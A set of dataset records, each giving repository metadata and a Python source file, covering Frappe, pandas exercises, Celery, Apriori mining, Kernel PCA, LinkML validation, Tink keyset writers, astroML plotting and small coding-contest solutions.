8806780712e5054373bdc136bb537dece0d2b9ac | ffd2126e1ba5d1acea0bb0b3d011f4ccaf1c1f1f | /gia/gia/doctype/gia_sector/gia_sector.py | 4a1e4524728a0939102446bd86307c02279f077f | [
"MIT"
] | permissive | alkuhlani/gia | fd55c65b0f430f24c7fbe3aef5ea911af8642702 | 9af9737cef7b0b947baa21f46c7be381c4fc9d98 | refs/heads/master | 2022-12-10T02:45:47.907158 | 2020-09-04T16:37:10 | 2020-09-04T16:37:10 | 276,495,714 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2020, Ahmed Mohammed Alkuhlani and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, throw
from frappe.model.document import Document
class GIASector(Document):
def validate(self):
if not self.parent_gia_sector:
frappe.throw(_("Please enter the parent"))
| [
"[email protected]"
] | |
fd9166714314627d931b92e8df033ea9d4f2ffd2 | 54a5f5ec2c5edf924b7dc7730ee7cb2a38ac4a39 | /DataFrame_manipulation_pandas/E01_Positional_and_labeled_indexing.py | aa09f4a045dbe19bc6a45b84a5dfebd5c0c513b2 | [] | no_license | dajofischer/Datacamp | fac413ec178375cedceababaf84f6b47a61fc821 | a03d16b8f342412f1ee077f2f196ee8404e2e21c | refs/heads/master | 2020-04-05T08:38:25.361746 | 2019-03-27T20:55:57 | 2019-03-27T20:55:57 | 156,722,561 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | # Assign the row position of election.loc['Bedford']: x
x = 4
# Assign the column position of election['winner']: y
y = 4
# Print the boolean equivalence
print(election.iloc[x, y] == election.loc['Bedford', 'winner'])
#nonsense text
#nonsenes2
| [
"[email protected]"
] | |
e33e3af781a4af593bf78acc8dc4120f93f12313 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/wellf.py | 01d938845a41da448d3678520087a53125ba2d11 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 141 | py | ii = [('RoscTTI3.py', 1), ('MedwTAI.py', 1), ('WadeJEB.py', 2), ('DibdTRL.py', 1), ('FitzRNS2.py', 1), ('HogaGMM2.py', 1), ('BeckWRE.py', 1)] | [
"[email protected]"
] | |
5651d66b1dd3f7adb98ce5c7bc17e2acfe92784a | 174620e5937ac217cfdc46fa1f58493e9d59dfdd | /lib/default/lib/python2.7/site-packages/celery/concurrency/base.py | e0f2eb514c23941ee91fd0003917de8230cc1dac | [] | no_license | Saifinbox/CKANPROJECT | 6552912317019ce7dca87a1367344dbf5d978062 | 89e1cac49b282106ff4595f54a4eb84bcc8d2ee9 | refs/heads/master | 2021-01-01T06:34:37.568829 | 2017-07-17T08:48:46 | 2017-07-17T08:48:46 | 97,453,740 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,732 | py | # -*- coding: utf-8 -*-
"""
celery.concurrency.base
~~~~~~~~~~~~~~~~~~~~~~~
TaskPool interface.
"""
from __future__ import absolute_import
import logging
import os
import time
from kombu.utils.encoding import safe_repr
from celery.utils import timer2
from celery.utils.log import get_logger
logger = get_logger('celery.concurrency')
def apply_target(target, args=(), kwargs={}, callback=None,
accept_callback=None, pid=None, **_):
if accept_callback:
accept_callback(pid or os.getpid(), time.time())
callback(target(*args, **kwargs))
class BasePool(object):
RUN = 0x1
CLOSE = 0x2
TERMINATE = 0x3
Timer = timer2.Timer
#: set to true if the pool can be shutdown from within
#: a signal handler.
signal_safe = True
#: set to true if pool supports rate limits.
#: (this is here for gevent, which currently does not implement
#: the necessary timers).
rlimit_safe = True
#: set to true if pool requires the use of a mediator
#: thread (e.g. if applying new items can block the current thread).
requires_mediator = False
#: set to true if pool uses greenlets.
is_green = False
_state = None
_pool = None
#: only used by multiprocessing pool
uses_semaphore = False
def __init__(self, limit=None, putlocks=True, forking_enable=True,
**options):
self.limit = limit
self.putlocks = putlocks
self.options = options
self.forking_enable = forking_enable
self._does_debug = logger.isEnabledFor(logging.DEBUG)
def on_start(self):
pass
def did_start_ok(self):
return True
def on_stop(self):
pass
def on_apply(self, *args, **kwargs):
pass
def on_terminate(self):
pass
def on_soft_timeout(self, job):
pass
def on_hard_timeout(self, job):
pass
def maybe_handle_result(self, *args):
pass
def maintain_pool(self, *args, **kwargs):
pass
def terminate_job(self, pid):
raise NotImplementedError(
'%s does not implement kill_job' % (self.__class__, ))
def restart(self):
raise NotImplementedError(
'%s does not implement restart' % (self.__class__, ))
def stop(self):
self.on_stop()
self._state = self.TERMINATE
def terminate(self):
self._state = self.TERMINATE
self.on_terminate()
def start(self):
self.on_start()
self._state = self.RUN
def close(self):
self._state = self.CLOSE
self.on_close()
def on_close(self):
pass
def init_callbacks(self, **kwargs):
pass
def apply_async(self, target, args=[], kwargs={}, **options):
"""Equivalent of the :func:`apply` built-in function.
Callbacks should optimally return as soon as possible since
otherwise the thread which handles the result will get blocked.
"""
if self._does_debug:
logger.debug('TaskPool: Apply %s (args:%s kwargs:%s)',
target, safe_repr(args), safe_repr(kwargs))
return self.on_apply(target, args, kwargs,
waitforslot=self.putlocks,
**options)
def _get_info(self):
return {}
@property
def info(self):
return self._get_info()
@property
def active(self):
return self._state == self.RUN
@property
def num_processes(self):
return self.limit
@property
def readers(self):
return {}
@property
def writers(self):
return {}
@property
def timers(self):
return {}
| [
"[email protected]"
] | |
42170e9a6ac498033863cd27ca0a6556bf1aa6c3 | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/apriori_20190422135150.py | 36ae75953708f032ec4b5b046220fb616cdb0b75 | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,768 | py | # Apriori算法
"""
由于Apriori算法假定项集中的项是按字典序排序的,而集合本身是无序的,所以我们在必要时需要进行set和list的转换;
由于要使用字典(support_data)记录项集的支持度,需要用项集作为key,而可变集合无法作为字典的key,因此在合适时机应将项集转为固定集合frozenset。
支持度
置信度
"""
class apriori_algorithm:
# 算法初始化
def __init__(self, minSupport, dataSet):
self.minSupport = minSupport # 最小支持度
self.dataSet = dataSet # 数据集
# 生成单个物品的项集列表
def generateC1(self, dataSet):
C1 = [] # 用于存放生成的单个物品的项集列表
# 遍历数据集
for data in dataSet:
for item in data:
if [item] not in C1:
C1.append([item])
C1.sort()
return C1
# 遍历数据集,和Ck对比,计数
def generateLk_by_Ck(self, dataSet, Ck, minSupport, support_data):
"""
Generate Lk by executing a delete policy from Ck.
Args:
data_set: 数据集
Ck: A set which contains all all frequent candidate k-itemsets.
min_support: The minimum support.
support_data: A dictionary. The key is frequent itemset and the value is support.
Returns:
Lk: A set which contains all all frequent k-itemsets.
"""
D = map(set, dataSet)
C = map(frozenset, Ck)
C1 = list(C) # 关于map对象的遍历,在内循环中遍历完最后一个元素后,再次访问时会放回空列表,所以外循环第二次进入的时候是空的,需要将其转为list处理
countData = dict()
for d in D: # set遍历
for c in C1:
if c.issubset(d): # 子集判断,并非元素判断
if c not in countData.keys(): # 将集合作为字典的键使用,c为[]型
countData[c] = 1
else:
countData[c] += 1
numItems = float(len(list(dataSet)))
returnList = []
supportData = dict()
# 遍历前面得到的计数字典
for key in countData:
support = countData[key] / numItems
if support >= minSupport:
returnList.insert(0, key) # insert() 函数用于将指定对象插入列表的指定位置
support_data[key] = support
return returnList
def generate_L(self, dataSet, k, min_support):
"""
Generate all frequent itemsets.
Args:
data_set:数据集
k: 频繁项集中含有的最多的元素
min_support: 最小支持度
Returns:
L: 出现的所有频繁项集
support_data: 每个频繁项集对应的支持度
"""
support_data = {}
C1 = self.generateC1(dataSet)
L1 = self.generateLk_by_Ck(dataSet, C1, min_support, support_data)
Lksub1 = L1.copy()
L = []
L.append(Lksub1)
for i in range(2, k + 1):
Ci = self.generateCK(Lksub1, i)
Li = self.generateLk_by_Ck(dataSet, Ci, min_support, support_data)
Lksub1 = Li.copy()
L.append(Lksub1)
return L, support_data
# generateCK 候选频繁项集产生 参数 Lk频繁项集,k:项集元素个数
def generateCK(self, Lk, k):
Ck = set()
len_Lk = len(list(Lk))
list_Lk = list(Lk)
for i in range(len_Lk):
for j in range(1, len_Lk):
l1 = list(list_Lk[i])
l2 = list(list_Lk[j])
l1.sort()
l2.sort()
if l1[0:k - 2] == l2[0:k - 2]:
Ck_item = list_Lk[i] | list_Lk[j]
if self.isCk(Ck_item, list_Lk):
Ck.add(Ck_item)
# Ck.add(Ck_item)
return Ck
# 频繁项集判断
def isCk(self, Ck_item, list_Lk):
for item in Ck_item:
sub_Ck = Ck_item - frozenset([item])
if sub_Ck not in list_Lk:
return False
return True
# 生成关联规则
def generate_big_rules(self, L, support_data, min_conf):
"""
Generate big rules from frequent itemsets.
Args:
L: 所有频繁项集的列表
support_data: 每个频繁项集对应的支持度
min_conf: 最小可信度
"""
big_rule_list = []
sub_set_list = []
for i in range(0, len(L)):
for freq_set in L[i]:
for sub_set in sub_set_list:
if sub_set.issubset(freq_set):
conf = support_data[freq_set] / support_data[freq_set - sub_set]
big_rule = (freq_set - sub_set, sub_set, conf)
if conf >= min_conf and big_rule not in big_rule_list:
print(freq_set - sub_set, " => ", sub_set, "conf: ", conf)
big_rule_list.append(big_rule)
sub_set_list.append(freq_set)
return big_rule_list
if __name__ == '__main__':
minS = 0.5
dataSet = [['这个','弄','鞍山', '挨打'], ['这个', '啊'], ['鞍山', '弄', '词典', '按错'], ['鞍山', '挨打','按下','爱玩']]
apriori = apriori_algorithm(minSupport=minS, dataSet=dataSet)
L, support_data = apriori.generate_L(dataSet, 1,minS)
print(L)
print(support_data)
big_rule_list = apriori.generate_big_rules(L, support_data, 0.5) | [
"[email protected]"
] | |
aa13bd841c98bf69edc143608a0dcaf19c026204 | 4cfbc12903651dedbc799f53a8078433196e7919 | /Pre Processing/Topic 7 - Kernal PCA/KERNEL_PCA_WITHOUT_SPLIT.py | 6974fa581f4052b61770920b3c784ba26c4341c3 | [] | no_license | gautam4941/Machine_Learning_Codes | 78bf86ab3caf6ee329c88ff18d25927125627a2c | 0009d12ca207a9b0431ea56decc293588eb447b1 | refs/heads/main | 2023-02-06T18:05:44.154641 | 2023-01-30T17:04:25 | 2023-01-30T17:04:25 | 353,594,523 | 0 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,398 | py | import pandas as pd
data = pd.read_csv('Social_Network_Ads.csv')
print( f"data :- \n{ data }\n" )
print( f"data.columns :- \n{ data.columns }\n" )
x = data.loc[ :, 'Gender' : 'EstimatedSalary' ]
y = data.loc[ :, 'Purchased' ]
print( f"x.isnull().sum() :- \n{ x.isnull().sum() }\n" )
print( f"y.isnull().sum() :- \n{ y.isnull().sum() }\n" )
print( f"x.dtypes :- \n{ x.dtypes }\n" )
print( f"y.dtypes :- \n{ y.dtypes }\n" )
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
x['Gender'] = le.fit_transform( x['Gender'] )
import matplotlib.pyplot as plt
# plt.plot( x['Age'], x['EstimatedSalary'], linestyle = '', marker = '*' )
# plt.xlabel( 'Age' )
# plt.ylabel( 'EstimatedSalary' )
# plt.title( 'Age V/s Salary' )
# plt.show()
from sklearn.decomposition import KernelPCA
kpca = KernelPCA( n_components = 2, kernel = 'rbf' ) #n_components is the number of columns getting trained
x = kpca.fit_transform( x )
print( f"After Kernal PCA, x :- \n{ x }\n" )
from sklearn.linear_model import LogisticRegression
lr = LogisticRegression()
lr.fit( x, y )
y_pred = lr.predict( x )
new_x_test = x.T
# plt.plot( x_test[0], x_test[1], linestyle = '', marker = '*' )
# plt.xlabel( 'Age' )
# plt.ylabel( 'EstimatedSalary' )
# plt.title( 'Age V/s Salary' )
# plt.show()
print( f"lr.score( x_test, y_test ) = { lr.score( x, y ) }" ) | [
"[email protected]"
] | |
9e8684300a753747f2ea81503addd0bd9141eee2 | 7ef5898dc861f7a5512953269db7b52d44f44bc5 | /linkml/utils/validation.py | 02ee97f62911680b3e797aa9db26dcd3bd75f727 | [
"CC0-1.0"
] | permissive | balhoff/linkml | eb5c26e9d8ace3c2a7a6f2f36872b9c2af7b97df | b27c36b24437f68878806518264f55f0f418cb0b | refs/heads/main | 2023-07-28T16:47:04.974232 | 2021-09-09T01:39:21 | 2021-09-09T01:39:21 | 404,550,589 | 0 | 0 | CC0-1.0 | 2021-09-09T01:45:37 | 2021-09-09T01:45:37 | null | UTF-8 | Python | false | false | 1,483 | py | import json
import sys
from typing import Type, Union, TextIO
import logging
import click
import jsonschema
from linkml_runtime.linkml_model import SchemaDefinition
from linkml_runtime.utils.yamlutils import as_dict, YAMLRoot
from linkml_runtime.dumpers import json_dumper
from linkml.generators.jsonschemagen import JsonSchemaGenerator
import linkml.utils.datautils as datautils
def _as_dict(inst):
# TODO: replace this with linkml_runtime.dictutils when 1.0.14 is released
inst_dict = json.loads(json_dumper.dumps(element=inst))
del inst_dict['@type']
return inst_dict
def validate_object(data: YAMLRoot, schema: Union[str, TextIO, SchemaDefinition], target_class: Type[YAMLRoot] = None,
closed: bool = True):
"""
validates instance data against a schema
:param data: LinkML instance to be validates
:param schema: LinkML schema
:param target_class: class in schema to validate against
:param closed:
:return:
"""
if target_class is None:
target_class = type(data)
inst_dict = _as_dict(data)
not_closed = not closed
jsonschemastr = JsonSchemaGenerator(schema, mergeimports=True, top_class=target_class.class_name,
not_closed=not_closed).serialize(not_closed=not_closed)
jsonschema_obj = json.loads(jsonschemastr)
return jsonschema.validate(inst_dict, schema=jsonschema_obj)
if __name__ == '__main__':
datautils.cli(sys.argv[1:]) | [
"[email protected]"
] | |
9954328c0d050bb4d64a911f7461a367bf36a59f | 8c50265b43add0e91e30245cc7af3c2558c248f5 | /tests/python/gpu/test_tvm_bridge.py | 5c87536bdbaea32571012424a4db77dab00c19ed | [
"BSD-3-Clause",
"BSD-2-Clause-Views",
"Zlib",
"Apache-2.0",
"BSD-2-Clause",
"Intel"
] | permissive | awslabs/dynamic-training-with-apache-mxnet-on-aws | 6a67f35d7e4b12fa8bba628bd03b2b031924e211 | 1063a979417fee8c820af73860eebd2a4f670380 | refs/heads/master | 2023-08-15T11:22:36.922245 | 2022-07-06T22:44:39 | 2022-07-06T22:44:39 | 157,440,687 | 60 | 19 | Apache-2.0 | 2022-11-25T22:23:19 | 2018-11-13T20:17:09 | Python | UTF-8 | Python | false | false | 2,440 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test TVM bridge, only enable this when TVM is available"""
import logging
import mxnet as mx
import numpy as np
import unittest
def test_tvm_bridge():
# only enable test if TVM is available
try:
import tvm
import tvm.contrib.mxnet
import topi
except ImportError:
logging.warn("TVM bridge test skipped because TVM is missing...")
return
def check(target, dtype):
shape = (20,)
scale = tvm.var("scale", dtype="float32")
x = tvm.placeholder(shape, dtype=dtype)
y = tvm.placeholder(shape, dtype=dtype)
z = tvm.compute(shape, lambda i: x[i] + y[i])
zz = tvm.compute(shape, lambda *i: z(*i) * scale.astype(dtype))
ctx = mx.gpu(0) if target == "cuda" else mx.cpu(0)
target = tvm.target.create(target)
# build the function
with target:
s = topi.generic.schedule_injective(zz)
f = tvm.build(s, [x, y, zz, scale])
# get a mxnet version
mxf = tvm.contrib.mxnet.to_mxnet_func(f, const_loc=[0, 1])
xx = mx.nd.uniform(shape=shape, ctx=ctx).astype(dtype)
yy = mx.nd.uniform(shape=shape, ctx=ctx).astype(dtype)
zz = mx.nd.empty(shape=shape, ctx=ctx).astype(dtype)
# invoke myf: this runs in mxnet engine
mxf(xx, yy, zz, 10.0)
np.testing.assert_allclose(
zz.asnumpy(), (xx.asnumpy() + yy.asnumpy()) * 10)
for tgt in ["llvm", "cuda"]:
for dtype in ["int8", "uint8", "int64",
"float32", "float64"]:
check(tgt, dtype)
if __name__ == "__main__":
import nose
nose.runmodule()
| [
"[email protected]"
] | |
6508b6eae18f254c28dd6343bef32cd4b4afd295 | 61fa932822d22ba480f7aa075573e688897ad844 | /simulation/decai/simulation/data/imdb_data_loader.py | fbc6d62dc1165cc5a608c3003156977db751c917 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | microsoft/0xDeCA10B | a8f118fa1f89f387a0b83f297250fc1846521f41 | 4066eeb2b5298c259a7c19c4d42ca35ef22e0569 | refs/heads/main | 2023-07-26T08:09:34.718104 | 2023-01-25T12:47:17 | 2023-01-25T12:47:17 | 181,561,897 | 538 | 133 | MIT | 2023-07-19T03:10:38 | 2019-04-15T20:37:11 | Python | UTF-8 | Python | false | false | 1,778 | py | from dataclasses import dataclass, field
from logging import Logger
from typing import List
import numpy as np
from injector import ClassAssistedBuilder, Module, inject, provider, singleton
from keras.datasets import imdb
from .data_loader import DataLoader
@inject
@dataclass
class ImdbDataLoader(DataLoader):
"""
Load data for sentiment analysis of IMDB reviews.
https://keras.io/datasets/#imdb-movie-reviews-sentiment-classification
"""
_logger: Logger
num_words: int = field(default=1000)
def classifications(self) -> List[str]:
return ["NEGATIVE", "POSITIVE"]
def load_data(self, train_size: int = None, test_size: int = None) -> (tuple, tuple):
self._logger.info("Loading IMDB review data using %d words.", self.num_words)
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=self.num_words)
if train_size is not None:
x_train, y_train = x_train[:train_size], y_train[:train_size]
if test_size is not None:
x_test, y_test = x_test[:test_size], y_test[:test_size]
def get_features(data):
result = np.zeros((len(data), self.num_words), dtype='int')
for i, x in enumerate(data):
for v in x:
result[i, v] = 1
return result
x_train = get_features(x_train)
x_test = get_features(x_test)
self._logger.info("Done loading IMDB review data.")
return (x_train, y_train), (x_test, y_test)
@dataclass
class ImdbDataModule(Module):
num_words: int = field(default=1000)
@provider
@singleton
def provide_data_loader(self, builder: ClassAssistedBuilder[ImdbDataLoader]) -> DataLoader:
return builder.build(num_words=self.num_words)
| [
"[email protected]"
] | |
587af0a9afab30d6dbe975f04b48b2543833db22 | 51507929d5bf732e6e5b7085015b86d097fc404d | /python/core/keyset_writer.py | 4e417f4417071723ba236115a738874609d779e8 | [
"Apache-2.0"
] | permissive | jojodeco2/tink | a77be3fd6958070c131f4d556b349b69b65e11cb | 46d4d5d6ff09f594c5460216c5b2cb11486076db | refs/heads/master | 2020-08-04T04:46:05.526255 | 2019-10-01T10:21:02 | 2019-10-01T10:21:02 | 212,011,212 | 0 | 0 | Apache-2.0 | 2019-10-01T04:18:08 | 2019-10-01T04:18:08 | null | UTF-8 | Python | false | false | 3,498 | py | # Copyright 2019 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Writes Keysets to file."""
from __future__ import absolute_import
from __future__ import division
from __future__ import google_type_annotations
from __future__ import print_function
import abc
import io
from google.protobuf import json_format
from tink.proto import tink_pb2
from tink.python.core import tink_error
class KeysetWriter(object):
"""Knows how to write keysets to some storage system."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def write(self, keyset: tink_pb2.Keyset) -> None:
"""Tries to write a tink_pb2.Keyset to some storage system."""
pass
@abc.abstractmethod
def write_encrypted(self, encrypted_keyset: tink_pb2.EncryptedKeyset) -> None:
"""Tries to write an tink_pb2.EncryptedKeyset to some storage system."""
pass
class JsonKeysetWriter(KeysetWriter):
"""Writes keysets in proto JSON wire format to some storage system.
cf. https://developers.google.com/protocol-buffers/docs/encoding
"""
def __init__(self, text_io_stream: io.TextIOBase):
self._io_stream = text_io_stream
def write(self, keyset: tink_pb2.Keyset) -> None:
if not isinstance(keyset, tink_pb2.Keyset):
raise tink_error.TinkError('invalid keyset.')
json_keyset = json_format.MessageToJson(keyset)
# TODO(b/141106504) Needed for python 2.7 compatibility. StringIO expects
# unicode, but MessageToJson outputs UTF-8.
if isinstance(json_keyset, bytes):
json_keyset = json_keyset.decode('utf-8')
self._io_stream.write(json_keyset)
self._io_stream.flush()
def write_encrypted(self, encrypted_keyset: tink_pb2.EncryptedKeyset) -> None:
if not isinstance(encrypted_keyset, tink_pb2.EncryptedKeyset):
raise tink_error.TinkError('invalid encrypted keyset.')
json_keyset = json_format.MessageToJson(encrypted_keyset)
# TODO(b/141106504) Needed for python 2.7 compatibility. StringIO expects
# unicode, but MessageToJson outputs UTF-8.
if isinstance(json_keyset, bytes):
json_keyset = json_keyset.decode('utf-8')
self._io_stream.write(json_keyset)
self._io_stream.flush()
class BinaryKeysetWriter(KeysetWriter):
"""Writes keysets in proto binary wire format to some storage system.
cf. https://developers.google.com/protocol-buffers/docs/encoding
"""
def __init__(self, binary_io_stream: io.BufferedIOBase):
self._io_stream = binary_io_stream
def write(self, keyset: tink_pb2.Keyset) -> None:
if not isinstance(keyset, tink_pb2.Keyset):
raise tink_error.TinkError('invalid keyset.')
self._io_stream.write(keyset.SerializeToString())
self._io_stream.flush()
def write_encrypted(self, encrypted_keyset: tink_pb2.EncryptedKeyset) -> None:
if not isinstance(encrypted_keyset, tink_pb2.EncryptedKeyset):
raise tink_error.TinkError('invalid encrypted keyset.')
self._io_stream.write(encrypted_keyset.SerializeToString())
self._io_stream.flush()
| [
"[email protected]"
] | |
19b16e038e42e69f3f52b17764d02d98614b0c87 | 364b36d699d0a6b5ddeb43ecc6f1123fde4eb051 | /_downloads_1ed/fig_XD_example.py | 6e7d5247c12d7f1e576f8087307c0067916096aa | [] | no_license | astroML/astroml.github.com | eae3bfd93ee2f8bc8b5129e98dadf815310ee0ca | 70f96d04dfabcd5528978b69c217d3a9a8bc370b | refs/heads/master | 2022-02-27T15:31:29.560052 | 2022-02-08T21:00:35 | 2022-02-08T21:00:35 | 5,871,703 | 2 | 5 | null | 2022-02-08T21:00:36 | 2012-09-19T12:55:23 | HTML | UTF-8 | Python | false | false | 3,918 | py | """
Extreme Deconvolution example
-----------------------------
Figure 6.11
An example of extreme deconvolution showing a simulated two-dimensional
distribution of points, where the positions are subject to errors. The top two
panels show the distributions with small (left) and large (right) errors. The
bottom panels show the densities derived from the noisy sample (top-right
panel) using extreme deconvolution; the resulting distribution closely matches
that shown in the top-left panel.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from astroML.decorators import pickle_results
from astroML.density_estimation import XDGMM
from astroML.plotting.tools import draw_ellipse
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#------------------------------------------------------------
# Sample the dataset
N = 2000
np.random.seed(0)
# generate the true data
x_true = (1.4 + 2 * np.random.random(N)) ** 2
y_true = 0.1 * x_true ** 2
# add scatter to "true" distribution
dx = 0.1 + 4. / x_true ** 2
dy = 0.1 + 10. / x_true ** 2
x_true += np.random.normal(0, dx, N)
y_true += np.random.normal(0, dy, N)
# add noise to get the "observed" distribution
dx = 0.2 + 0.5 * np.random.random(N)
dy = 0.2 + 0.5 * np.random.random(N)
x = x_true + np.random.normal(0, dx)
y = y_true + np.random.normal(0, dy)
# stack the results for computation
X = np.vstack([x, y]).T
Xerr = np.zeros(X.shape + X.shape[-1:])
diag = np.arange(X.shape[-1])
Xerr[:, diag, diag] = np.vstack([dx ** 2, dy ** 2]).T
#------------------------------------------------------------
# compute and save results
@pickle_results("XD_toy.pkl")
def compute_XD_results(n_components=10, n_iter=500):
clf = XDGMM(n_components, n_iter=n_iter)
clf.fit(X, Xerr)
return clf
clf = compute_XD_results(10, 500)
sample = clf.sample(N)
#------------------------------------------------------------
# Plot the results
fig = plt.figure(figsize=(5, 3.75))
fig.subplots_adjust(left=0.1, right=0.95,
bottom=0.1, top=0.95,
wspace=0.02, hspace=0.02)
ax1 = fig.add_subplot(221)
ax1.scatter(x_true, y_true, s=4, lw=0, c='k')
ax2 = fig.add_subplot(222)
ax2.scatter(x, y, s=4, lw=0, c='k')
ax3 = fig.add_subplot(223)
ax3.scatter(sample[:, 0], sample[:, 1], s=4, lw=0, c='k')
ax4 = fig.add_subplot(224)
for i in range(clf.n_components):
draw_ellipse(clf.mu[i], clf.V[i], scales=[2], ax=ax4,
ec='k', fc='gray', alpha=0.2)
titles = ["True Distribution", "Noisy Distribution",
"Extreme Deconvolution\n resampling",
"Extreme Deconvolution\n cluster locations"]
ax = [ax1, ax2, ax3, ax4]
for i in range(4):
ax[i].set_xlim(-1, 13)
ax[i].set_ylim(-6, 16)
ax[i].xaxis.set_major_locator(plt.MultipleLocator(4))
ax[i].yaxis.set_major_locator(plt.MultipleLocator(5))
ax[i].text(0.05, 0.95, titles[i],
ha='left', va='top', transform=ax[i].transAxes)
if i in (0, 1):
ax[i].xaxis.set_major_formatter(plt.NullFormatter())
else:
ax[i].set_xlabel('$x$')
if i in (1, 3):
ax[i].yaxis.set_major_formatter(plt.NullFormatter())
else:
ax[i].set_ylabel('$y$')
plt.show()
| [
"[email protected]"
] | |
75683d574fd6fafc97d6262c264e53f43ff0a56b | 19ee7dd974ba8b1731e9450c174df7630f63eaad | /Api/recognition/serializers.py | bc1cd767bbebc3dcfc9d20d425f5e7079f0f1748 | [] | no_license | minjjjae/No-Mask-Trace-System | 12d3a5a146f5526b9dbba5a8b75d6adc6c8a2e2b | 61c76197d7ae921823b795effd9f267c92016a97 | refs/heads/main | 2023-01-19T08:35:19.643717 | 2020-11-28T05:27:52 | 2020-11-28T05:27:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | from recognition.models import Recognition
from rest_framework import serializers
class RecognitionSerializer(serializers.HyperlinkedModelSerializer):
image = serializers.ImageField(max_length=None, use_url=True)
class Meta:
model = Recognition
fields = ("pk", "encodeLst", "description", "created_at", "image")
| [
"[email protected]"
] | |
2514e06398d1649d7e768e2219aa835bfc94e0c7 | dffd7156da8b71f4a743ec77d05c8ba031988508 | /joi/prelim/2019/yo1c/c.py | 8fa22ad3e7acb87ef87d1e4727e8bf36c56ef603 | [] | no_license | e1810/kyopro | a3a9a2ee63bc178dfa110788745a208dead37da6 | 15cf27d9ecc70cf6d82212ca0c788e327371b2dd | refs/heads/master | 2021-11-10T16:53:23.246374 | 2021-02-06T16:29:09 | 2021-10-31T06:20:50 | 252,388,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | n, *a = map(int, open(0).read().split())
cnt = ans = 0
prev = 0
for i in a:
if prev>i:
ans = max(ans, cnt)
cnt = 0
cnt += 1
prev = i
print(max(ans, cnt))
| [
"[email protected]"
] | |
daf6299762e39365d4e0099a36ae78a1a59bcd0a | 6ec91b363b077bffd33f15300a0935124e9fb915 | /Cracking_the_Code_Interview/Leetcode/3.String/290.Word_Pattern.py | 766301dce21b1c686fdd7e0e347044af480ca094 | [] | no_license | lzxyzq/Cracking_the_Coding_Interview | 03232515ae8eb50394d46322d36b230d1a626fcf | 79dee7dab41830c4ff9e38858dad229815c719a0 | refs/heads/master | 2023-06-05T19:52:15.595289 | 2021-06-23T22:46:02 | 2021-06-23T22:46:02 | 238,068,000 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,531 | py | '''
@Author: your name
@Date: 2020-06-09 17:21:16
@LastEditTime: 2020-06-10 12:19:27
@LastEditors: Please set LastEditors
@Description: In User Settings Edit
@FilePath: /Cracking_the_Code_Interview/Leetcode/String/290.Word_Pattern.py
'''
# Given a pattern and a string str, find if str follows the same pattern.
# Here follow means a full match, such that there is a bijection between a letter in pattern and a non-empty word in str.
'''
Example 1:
Input: pattern = "abba", str = "dog cat cat dog"
Output: true
Example 2:
Input:pattern = "abba", str = "dog cat cat fish"
Output: false
Example 3:
Input: pattern = "aaaa", str = "dog cat cat dog"
Output: false
Example 4:
Input: pattern = "abba", str = "dog dog dog dog"
Output: false
'''
# Notes:
# You may assume pattern contains only lowercase letters, and str contains lowercase letters that may be separated by a single space.
# 1.split()
# 2.等长len()
# 3.hashmap key:pattern value:str
class Solution:
def wordPattern(self, pattern: str, str: str) -> bool:
str = str.split()
result = ''
if len(str) != len(pattern):
return False
d = {}
for i in range(len(pattern)):
if str[i] not in d:
if pattern[i] not in d.values():
d[str[i]] = pattern[i]
else:
return False
result += d[str[i]]
return result == pattern
pattern = "abba"
str = "dog cat cat dog"
words = str.split(' ')
tuple(zip(words, pattern)) | [
"[email protected]"
] | |
